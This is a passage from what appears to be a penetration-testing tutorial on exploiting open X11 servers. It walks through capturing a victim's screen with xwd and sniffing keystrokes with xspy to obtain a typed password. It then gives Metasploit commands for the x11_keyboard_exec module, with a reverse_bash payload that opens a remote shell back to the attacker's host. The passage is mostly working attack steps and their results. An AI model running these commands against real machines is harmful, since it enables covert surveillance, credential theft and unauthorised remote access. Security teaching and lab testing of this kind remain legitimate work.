![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-drN0bwIQOj8/Wx1ICT_N8MI/AAAAAAAAXVc/CuTdTol1rs03gxziPOGzZludS5Yb3um7gCLcBGAs/s1600/8.png?w=687&ssl=1)
After running the above command, we have successfully captured a screenshot of the victim’s system.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-wXe0ELVLYco/Wx1ICVxnAsI/AAAAAAAAXVg/aUIKqb99NvgWKO4auSf6_LnY_xsk7HtDQCLcBGAs/s1600/9.png?w=687&ssl=1)
Here we have the screenshot captured by xwd, but it is in .xwd format, so to view it we have to convert it to a viewable format such as .png.
convert screenshot.xwd screenshot.png
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-503W3yeUVF8/Wx1H9WwjYmI/AAAAAAAAXUc/9dNO6kgiHWc6h_gD52HZLf2orTnEPdaiACLcBGAs/s1600/10.png?w=687&ssl=1)
This command converts the xwd file to a png file. After running it, we can find the screenshot in png format as shown below:
On opening the png file we can see that xwd has successfully captured a screenshot of the target system.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-qPBWA22DwsQ/Wx1H-pUZHWI/AAAAAAAAXUw/lQCIMSngGLwtLdABDm5KlqL2mD3nHOhZgCLcBGAs/s1600/12.png?w=687&ssl=1)
XSPY
XSPY is a built-in tool in Kali Linux for X Window servers. It is a sniffer: it captures keystrokes on a remote or local X server.
xspy 192.168.1.109
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-czuhy1tXxNE/Wx1H-RTWUzI/AAAAAAAAXUo/29J_WVUApvIkCJrJVr_D5Eycz0ziGrkDgCLcBGAs/s1600/13.png?w=687&ssl=1)
As we can see from the screenshot, we got the user’s password because the victim unknowingly typed it. Note that the password is not visible in the server’s terminal, but since xspy captures the keys typed, we have the password.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-0WVMqKWgI2k/Wx1H-Ut_16I/AAAAAAAAXUs/uJ4LD2_EcjQZZzSUEdrBL2JCJqCAFzy4ACLcBGAs/s1600/14.png?w=687&ssl=1)
Getting the Shell through Metasploit
Now we will use the X11 Keyboard Command Injection module of the Metasploit Framework. This module exploits an open X11 server by connecting and registering a virtual keyboard. The virtual keyboard is then used to open an xterm or gnome-terminal and type and execute the payload.
NOTE: As the X server is a visual service, while the module executes, every action taken on the target system will be visible to the victim.
Now, after opening the Metasploit Framework, we use the module as shown:
use unix/x11/x11_keyboard_exec
msf exploit(unix/x11/x11_keyboard_exec) > set rhost 192.168.1.109
msf exploit(unix/x11/x11_keyboard_exec) > set payload cmd/unix/reverse_bash
msf exploit(unix/x11/x11_keyboard_exec) > set lhost 192.168.1.120
msf exploit(unix/x11/x11_keyboard_exec) > set lport 4444
msf exploit(unix/x11/x11_keyboard_exec) > set time_wait 10
msf exploit(unix/x11/x11_keyboard_exec) > run
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-C6RITIw7mCs/Wx1H-0Ct0uI/AAAAAAAAXU0/AxAChutryLQ-VBEUJ2tlZRLp6IVdEVtigCLcBGAs/s1600/15.png?w=687&ssl=1)
After running the module, it first connects to the server, searches for xterm and opens it.
Then, after waiting for 10 seconds (the wait time we set earlier), it starts typing the command into the xterm.
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-mcQfKv7TV6M/Wx1H_U0psZI/AAAAAAAAXU4/NY2-ZuTmIN8f9S_vihYTotmpV5DQUHqAACLcBGAs/s1600/17.png?w=687&ssl=1)
After executing this command, xterm closes, but it provides a command shell to the attacker as shown.
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-rd6qSA0k3zA/Wx1H_aE0WfI/AAAAAAAAXVA/liTp8GMGyggkar-vdAx8aIV86l4Ms6BhwCLcBGAs/s1600/18.png?w=687&ssl=1)